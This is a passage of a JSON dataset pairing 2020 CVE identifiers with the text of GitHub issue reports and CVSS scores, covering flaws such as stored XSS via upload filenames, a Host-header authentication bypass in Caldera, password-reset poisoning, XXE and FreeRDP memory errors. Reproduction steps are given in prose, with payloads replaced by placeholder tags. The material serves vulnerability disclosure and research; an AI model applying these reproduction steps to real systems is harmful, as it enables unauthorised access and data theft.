        "Issue_Url_old": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36",
        "Issue_Url_new": "https://github.com/styria-digital/django-rest-framework-jwt/issues/36",
        "Repo_new": "styria-digital/django-rest-framework-jwt",
        "Issue_Created_At": "2020-03-02T20:17:34Z",
        "description": "Blacklisted tokens can still be refreshed. If you configure an app to allow blacklisting tokens and turn APITAG on, then you can still operate the refresh endpoint using a blacklisted token, which allows you to side step the fact that the token is invalidated.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10594",
        "Issue_Url_old": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484",
        "Issue_Url_new": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484",
        "Repo_new": "jpadilla/django-rest-framework-jwt",
        "Issue_Created_At": "2019-07-08T11:01:47Z",
        "description": "Status. Hello there, For a long time now I've honestly thought I'd have the time and energy to come back and work on this project, and I think I still don't. I've not worked on any project recently needing it, which makes it harder to find time to come back. At some point I also noticed I no longer liked how the project had evolved and that it deserved a fair redesign and there are a few fundamental changes required. Now I'm certain that I wouldn't be able to work on this with the care required for a major version bump. I'm definitely not proud at how long it has taken me to make this or any update, I recognize that and I'm sorry for not having spoken out sooner. There's two efforts/projects that I'd like to point out to: Fork: URLTAG Drop in updated replacement fork. I'm willing to transfer repo, pypi, etc, to keep this going. Alternative: URLTAG Many of the changes that I've wanted to work on are already done here. This is what I would probably use today. Learned quite a few things from this. Thanks to everyone, including past collaborators and contributors. \u2764\ufe0f",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10596",
        "Issue_Url_old": "https://github.com/opencart/opencart/issues/7810",
        "Issue_Url_new": "https://github.com/opencart/opencart/issues/7810",
        "Repo_new": "opencart/opencart",
        "Issue_Created_At": "2020-01-09T04:23:52Z",
        "description": "Stored Cross Site Scripting APITAG on Opencart Admin Dashboard. What version of APITAG are you reporting this for? Opencart NUMBERTAG Describe the bug Stored Cross Site Scripting (XSS) Authenticated is found in users image upload section in opencart admin panel. Opencart is accepting filenames with arbitrary code in it and not escaping them so the APITAG get executed. Malicious script in the admin dashboard can be injected permanently and can be used to steal the user\u2019s sensitive information like cookies, keystrokes, account information etc To Reproduce Steps to reproduce the behavior NUMBERTAG Go to PATHTAG and login with credentials NUMBERTAG Then navigate to APITAG and click on Action button on top right corner. FILETAG NUMBERTAG Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload \"> APITAG and then upload it as new user profile image NUMBERTAG After the upload completes the XSS pop up executes as shown below and it will gets executed each time someone visits the Image manager section. FILETAG Expected behavior Escaping and sanitation of HTML tags/ Special characters before storing or processing them, so that the code does not executes. Although XSS was strictly filtered on other sections, here we were able to execute it because of filename so filenames, file extensions and headers should be analyzed to prevent XSS and other file upload vulnerabilities. Screenshots / Screen recordings FILETAG Server / Test environment (please complete the following information): Kali Linu NUMBERTAG PHP version NUMBERTAG Apache version NUMBERTAG Browser(s) tested with: Mozilla Firefox Latest Build",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-10672",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2659",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2659",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-16T00:52:40Z",
        "description": "Block one more gadget type ( ). (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Reporters: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10673",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2660",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2660",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-18T01:32:04Z",
        "description": "Block one more gadget type (TO BE FILLED). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Reporter: threedr3am Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10675",
        "Issue_Url_old": "https://github.com/buger/jsonparser/issues/188",
        "Issue_Url_new": "https://github.com/buger/jsonparser/issues/188",
        "Repo_new": "buger/jsonparser",
        "Issue_Created_At": "2020-03-09T10:40:07Z",
        "description": "infinite loop in Delete. Hi. A call to function Delete may cause infinite loop. I wish you could take a look. URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10678",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6258",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6258",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-03-17T01:40:34Z",
        "description": "Authentication provider sync error. Details coming soon",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10683",
        "Issue_Url_old": "https://github.com/dom4j/dom4j/issues/87",
        "Issue_Url_new": "https://github.com/dom4j/dom4j/issues/87",
        "Repo_new": "dom4j/dom4j",
        "Issue_Created_At": "2020-04-22T11:10:29Z",
        "description": "APITAG uses system APITAG or APITAG which has unsecure defaults. The constructor APITAG calls one of the factory method form Java runtime library \u2013 APITAG or APITAG . These factory methods do not have safe defaults, such as downloading external entities. Create the new factory method APITAG which overrides Java runtime library defaults and sets following features: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10688",
        "Issue_Url_old": "https://github.com/quarkusio/quarkus/issues/7248",
        "Issue_Url_new": "https://github.com/quarkusio/quarkus/issues/7248",
        "Repo_new": "quarkusio/quarkus",
        "Issue_Created_At": "2020-02-18T08:07:18Z",
        "description": "XSS vulnerability in APITAG Description The no resource endpoint HTML page which is rendered on ERRORTAG errors introduces XSS vulnerability. Given as an example a GET endpoint which accepts a paging parameter in the form \"start,offset\" (i.e NUMBERTAG A request like: APITAG would lead to the following exception, and the ERRORTAG page in turn would execute the script (alert in our case). ERRORTAG Implementation ideas Enable the ERRORTAG HTML page only in DEV mode.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10689",
        "Issue_Url_old": "https://github.com/eclipse/che/issues/15651",
        "Issue_Url_new": "https://github.com/eclipse/che/issues/15651",
        "Repo_new": "eclipse/che",
        "Issue_Created_At": "2020-01-10T11:56:26Z",
        "description": "Improve isolation of Che theia and che machine exec components. Is your task related to a problem? Please describe. Under some conditions, there is a possibility to reach the port of one workspace from another workspace. To improve the isolation of the major Eclipse Che components we would like to. Describe the solution you'd like NUMBERTAG Use single pod for jwt proxy and other workspace containers NUMBERTAG make machine exec, theia remote runtime and theia endpoints listening to localhost only Describe alternatives you've considered n/a Additional context n/a",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-10699",
        "Issue_Url_old": "https://github.com/open-iscsi/targetcli-fb/issues/162",
        "Issue_Url_new": "https://github.com/open-iscsi/targetcli-fb/issues/162",
        "Repo_new": "open-iscsi/targetcli-fb",
        "Issue_Created_At": "2020-03-23T05:08:02Z",
        "description": "PATHTAG is world writable. The systemd socket unit fails to specify any APITAG so the socket is world writable NUMBERTAG as such any user can connect to it and send commands to targetclid without authentication. This is a likely a security vulnerability. URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-10729",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/34144",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/34144",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2017-12-21T14:02:15Z",
        "description": "two random password lookups in same task return same value. ISSUE TYPE Bug Report COMPONENT NAME lookups ANSIBLE VERSION APITAG CONFIGURATION no custom config OS / ENVIRONMENT Linux SUMMARY two consecutive tasks that set facts from password lookup with same length get identical values. separate tasks or different length result in different values, as expected. STEPS TO REPRODUCE yaml name: Set random passwords for clusters set_fact: password1: \"{{ lookup('password', PATHTAG length NUMBERTAG password2: \"{{ lookup('password', PATHTAG length NUMBERTAG delegate_to: localhost delegate_facts: True debug: msg: APITAG APITAG EXPECTED RESULTS two different values ACTUAL RESULTS two identical values changing length for one of these, or using separate tasks, gives different values. URLTAG says \"A special case is using /dev/null as a path. The password lookup will generate a new random password each time\", thus the current behaviour is at least confusing and unexpected. from irc : CODETAG `",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-10732",
        "Issue_Url_old": "https://github.com/google/kmsan/issues/76",
        "Issue_Url_new": "https://github.com/google/kmsan/issues/76",
        "Repo_new": "google/kmsan",
        "Issue_Created_At": "2020-04-18T09:13:03Z",
        "description": "BUG: KMSAN: uninit value in kmsan_handle_dma. While fuzzing latest KMSAN build with HEALER(syscall fuzzer, not published yet), uninit value is found in kmsan_handle_dma. It seems KMSAN found bugs in itself. Caused by this call sequence FILETAG . With this crash FILETAG . THE latest KMSAN is used with this config FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 2.5,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-10799",
        "Issue_Url_old": "https://github.com/deeplook/svglib/issues/229",
        "Issue_Url_new": "https://github.com/deeplook/svglib/issues/229",
        "Repo_new": "deeplook/svglib",
        "Issue_Created_At": "2020-02-25T11:18:21Z",
        "description": "No disabling external entity expansion (XXE). Hi! I found that I can perform XXE attack when using svg2rlg function Code: CODETAG Payload APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10807",
        "Issue_Url_old": "https://github.com/mitre/caldera/issues/1405",
        "Issue_Url_new": "https://github.com/mitre/caldera/issues/1405",
        "Repo_new": "mitre/caldera",
        "Issue_Created_At": "2020-03-18T15:12:57Z",
        "description": "Serious Security Flaw: API Requests from localhost. Hi guys, While checking our your API I've found a serious security flaw, which allows any unauthenticated user to perform any kind of API requests, which basically makes the whole tool and therefore any agents on end hosts exposable to anyone having access to the Caldera REST API. The following function is responsible for checking authentication in your code: ERRORTAG Basically it allows to bypass authentication if APITAG is contained within APITAG (which is set to APITAG per default). You are using the aiohttp library, in which host is usually the Host header of the http request (see URLTAG This works fine if you are performing a curl request from localhost for example, but be aware that the HTTP Host header is mutable for any request performed by a user. So if you just overwrite the Host header with \"localhost NUMBERTAG while performing a request to a public IP for example Caldera assumes you are performing the request to localhost and therefore disables authentication checks. Here is a POC in Postman: APITAG Body of the request: APITAG Response: APITAG As you can see I've succesfully performed an API request while using a IP within my network and not localhost. I've set the Host header to localhost and were able to fetch details without any authentication. That really is a serious flaw in the application, if I have running productive agents an attacker can execute arbitrary commands in my network. I'd suggest removing the no authentication \"feature\" for requests to localhost completely. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10870",
        "Issue_Url_old": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028",
        "Issue_Url_new": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028",
        "Repo_new": "zim-desktop-wiki/zim-desktop-wiki",
        "Issue_Created_At": "2020-03-06T22:22:48Z",
        "description": "Predictable /tmp/zim USER directory allows for denial of service. Description Zim creates temporary directories with predictable names. A malicious user could predict and create Zim's temporary directories and prevent other users from being able to start Zim, resulting in a denial of service. Steps to Reproduce NUMBERTAG Create two users: user1 and user NUMBERTAG As user1: APITAG NUMBERTAG As user2: Start Zim Zim will attempt to change the permissions of /tmp/user2 to NUMBERTAG Because /tmp/user2 is actually owned by user1, the call to APITAG will fail and Zim will crash. Workaround An affected user can set the $TMP or $TMPDIR environment variables to point to somewhere that is not world writable (e.g. APITAG ). Version Affected NUMBERTAG and later Operating System Linux Severity Low",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-10871",
        "Issue_Url_old": "https://github.com/openwrt/luci/issues/3766",
        "Issue_Url_new": "https://github.com/openwrt/luci/issues/3766",
        "Repo_new": "openwrt/luci",
        "Issue_Created_At": "2020-03-18T20:35:13Z",
        "description": "security: information disclosure to unauthenticated guest. Recent openwrt builds show the administration menu to unauthenticated guests: an attacker would be able to know the presence of installed packages and services on the box. version banner: APITAG by APITAG Master (git NUMBERTAG APITAG NUMBERTAG ed0d NUMBERTAG APITAG SNAPSHOT r NUMBERTAG b NUMBERTAG b_ FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10871",
        "Issue_Url_old": "https://github.com/openwrt/luci/issues/3653",
        "Issue_Url_new": "https://github.com/openwrt/luci/issues/3653",
        "Repo_new": "openwrt/luci",
        "Issue_Created_At": "2020-02-19T22:37:08Z",
        "description": "Header topmenu shown logged out. On commit r NUMBERTAG a NUMBERTAG b NUMBERTAG a the topmenu \" APITAG \" is shown while no user logged in. FILETAG Any idea how to solve this issue? Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10871",
        "Issue_Url_old": "https://github.com/openwrt/luci/issues/3563",
        "Issue_Url_new": "https://github.com/openwrt/luci/issues/3563",
        "Repo_new": "openwrt/luci",
        "Issue_Created_At": "2020-01-25T21:59:41Z",
        "description": "luci base: menu and i NUMBERTAG n plays very BADLY with sysauth=false in master. APITAG pages with sysauth=false (e.g. status pages that should work even for an user that is not logged in) are broken on APITAG master. The symptom is that when you access the page with \"sysauth=false\" attribute, the menu disappears, as in: not even nodes that are also sysauth=false show up. What should happen: the menu should list all pages, always, and require authentication if you try to access one of them while lacking the required credentials. Translations are also broken, and doubly so NUMBERTAG They try to XHR something from a node that is below /admin/, even if you are on a node on an entirely different subtree (like say, a /status node that should work unauthenticated and be the first page the user gets when he connects to the modem NUMBERTAG Whatever the translation stuff tries to fetch is hiding behind a sysauth=true node, which renders it useless for any sysauth=false page [if the user is unauthenticated] Maybe the /l NUMBERTAG n/ or /i NUMBERTAG n/ namespace (or even wherever luci static ends up) should be used for anything the i NUMBERTAG n mechanism needs? It really doesn't make sense to have it tied to /admin/.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10931",
        "Issue_Url_old": "https://github.com/memcached/memcached/issues/629",
        "Issue_Url_new": "https://github.com/memcached/memcached/issues/629",
        "Repo_new": "memcached/memcached",
        "Issue_Created_At": "2020-03-23T09:21:26Z",
        "description": "(DOS attack NUMBERTAG day buffer overflow vulnerability reveal. Hi, Memcached team, Recently, I revealed a buffer overflow vulnerability which may cause DOS attack. The exploit details can be found as following. Affect Version memcached NUMBERTAG memcached NUMBERTAG Root cause file location: APITAG NUMBERTAG FILETAG Code Audit CODETAG in line NUMBERTAG since there is no mechanism to verify the parameter's length, in this case, the length of \" extlen \" when calling memcpy function, It will cause buffer overflow if large value assigned to the extlen variable. POC APITAG for the POC snippet, first, if I assign a large value to the variable extlen , on the other hand, in order to bypass the validation of data packet which sent in following code snippet, APITAG we can construct a very large data packet. After that, the program will crash because of the issue mentioned above. Note: Please confirm this issue ASAP. Besides, just letting you know, I am gonna submit this issue to CVE mitre. Please let me if you have any questions. Sincerely, Icejl",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10944",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7468",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7468",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2020-03-24T15:29:53Z",
        "description": "Reserved issue. This a reserved issue for NUMBERTAG release.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-10966",
        "Issue_Url_old": "https://github.com/hestiacp/hestiacp/issues/748",
        "Issue_Url_new": "https://github.com/hestiacp/hestiacp/issues/748",
        "Repo_new": "hestiacp/hestiacp",
        "Issue_Created_At": "2020-03-23T06:15:49Z",
        "description": "Manipulation of Host Header lead to Account Takeover Vulnerability. Tbh, vulnerability is pretty simple. On line NUMBERTAG SERVER FILETAG So that means, $_SERVER FILETAG Actual Host header value \u0130S NOT hacker.com but the URL will be hacker.com in the password reset e mail. As you can following screenshot, even though the Vesta is being installed on APITAG on port NUMBERTAG URL placed in the e mail for account recovery is HACKER.com now. So if the admin user click on that link in the e mail, HACKER.COM will steal the code value which is enough for resetting password of the admin user. PS: I should mention that in the real life use case you can very similar domain name instead of hacker.com :) Since the e mail is being sanded from Vesta server, it\u2019s not a kind of phishing attack. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10968",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2662",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2662",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-23T01:31:30Z",
        "description": "Block one more gadget type (...). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10969",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2642",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2642",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-03-04T00:05:00Z",
        "description": "Block one more gadget type APITAG CVE to be allocated). (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: to be allocated Reporters: threedr3am Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10990",
        "Issue_Url_old": "https://github.com/Accenture/mercury/issues/13",
        "Issue_Url_new": "https://github.com/accenture/mercury/issues/13",
        "Repo_new": "accenture/mercury",
        "Issue_Created_At": "2020-01-06T00:12:35Z",
        "description": "Security Contact Requested. MENTIONTAG and I found a security vulnerability within the mercury project. We were hoping to get a core maintainer's contact details to responsibly disclose this vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10991",
        "Issue_Url_old": "https://github.com/mulesoft/apikit/issues/547",
        "Issue_Url_new": "https://github.com/mulesoft/apikit/issues/547",
        "Repo_new": "mulesoft/apikit",
        "Issue_Created_At": "2020-03-25T08:01:53Z",
        "description": "XXE in apikit. While reading the code in the apikit project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10992",
        "Issue_Url_old": "https://github.com/azkaban/azkaban/issues/2478",
        "Issue_Url_new": "https://github.com/azkaban/azkaban/issues/2478",
        "Repo_new": "azkaban/azkaban",
        "Issue_Created_At": "2020-03-25T08:03:26Z",
        "description": "XXE in Azkaban. While reading the code in the Azkaban project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10993",
        "Issue_Url_old": "https://github.com/osmandapp/Osmand/issues/8711",
        "Issue_Url_new": "https://github.com/osmandapp/osmand/issues/8711",
        "Repo_new": "osmandapp/osmand",
        "Issue_Created_At": "2020-03-25T08:02:39Z",
        "description": "XXE in Osmand. While reading the code in the Osmand project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11004",
        "Issue_Url_old": "https://github.com/Admidio/admidio/issues/908",
        "Issue_Url_new": "https://github.com/admidio/admidio/issues/908",
        "Repo_new": "admidio/admidio",
        "Issue_Created_At": "2020-04-06T12:29:36Z",
        "description": "Unauthenticated Blind SQL injection. Hi, I want to report a critical vulnerability in Admidio management system. Can you please start a security advisory in the security section and add me so we can discuss the vulnerability privately?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11005",
        "Issue_Url_old": "https://github.com/SeppPenner/WindowsHello/issues/3",
        "Issue_Url_new": "https://github.com/sepppenner/windowshello/issues/3",
        "Repo_new": "sepppenner/windowshello",
        "Issue_Created_At": "2019-08-22T02:16:23Z",
        "description": "APITAG Security of the Encrypted data. If I use this library to encrypt text and write the output to a txt file, could another executable be able to decrypt the text using the static method APITAG from this same library, without the need to use Windows Hello Authentication? Maybe for somebody the answer to this question is clear from the code, but I'm just learning, and I do it in my spare time. Thanks.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-11014",
        "Issue_Url_old": "https://github.com/simpleledger/Electron-Cash-SLP/issues/126",
        "Issue_Url_new": "https://github.com/simpleledger/electron-cash-slp/issues/126",
        "Repo_new": "simpleledger/electron-cash-slp",
        "Issue_Created_At": "2020-04-24T17:37:42Z",
        "description": "Mint baton sent to token receiver address.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-11042",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6010",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6010",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T06:54:51Z",
        "description": "memory out of bounds read in update_read_icon_info. version APITAG vuln code APITAG first read APITAG , APITAG and APITAG from the APITAG CODETAG And then it check APITAG and APITAG APITAG Then it could call APITAG to read data from s, size is APITAG CODETAG so when APITAG and APITAG , it could lead memory out of bounds read",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 5.2,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11044",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6013",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6013",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T11:10:29Z",
        "description": "double free in APITAG version APITAG vuln code APITAG first read new_len from stream, and pass the new_len to realloc Then it could call APITAG , this could free APITAG , and return NULL realloc function source code CODETAG when new_data is NULL, it could call free_cache_bitmap NUMBERTAG order to free APITAG again. Double Free! function code. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 2.2,
        "impactScore": 1.4,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11045",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6005",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6005",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T01:42:42Z",
        "description": "memory out of bounds read in update_read_bitmap_data. vuln code ERRORTAG The function first verifies that the length of s cannot be less than NUMBERTAG and then reads NUMBERTAG bytes later. If APITAG and APITAG , it will continue to read data from the stream without check if the length in the stream is enough",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 2.5,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11046",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6006",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6006",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2020-03-31T02:32:52Z",
        "description": "stream out of bounds seek in update_read_synchronize could lead out of bounds read after. vuln code ERRORTAG the code just seek the stream pointer without check stream's length, it could lead APITAG , then the check in other function could failed commit APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 2.2,
        "impactScore": 1.4,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-11047",
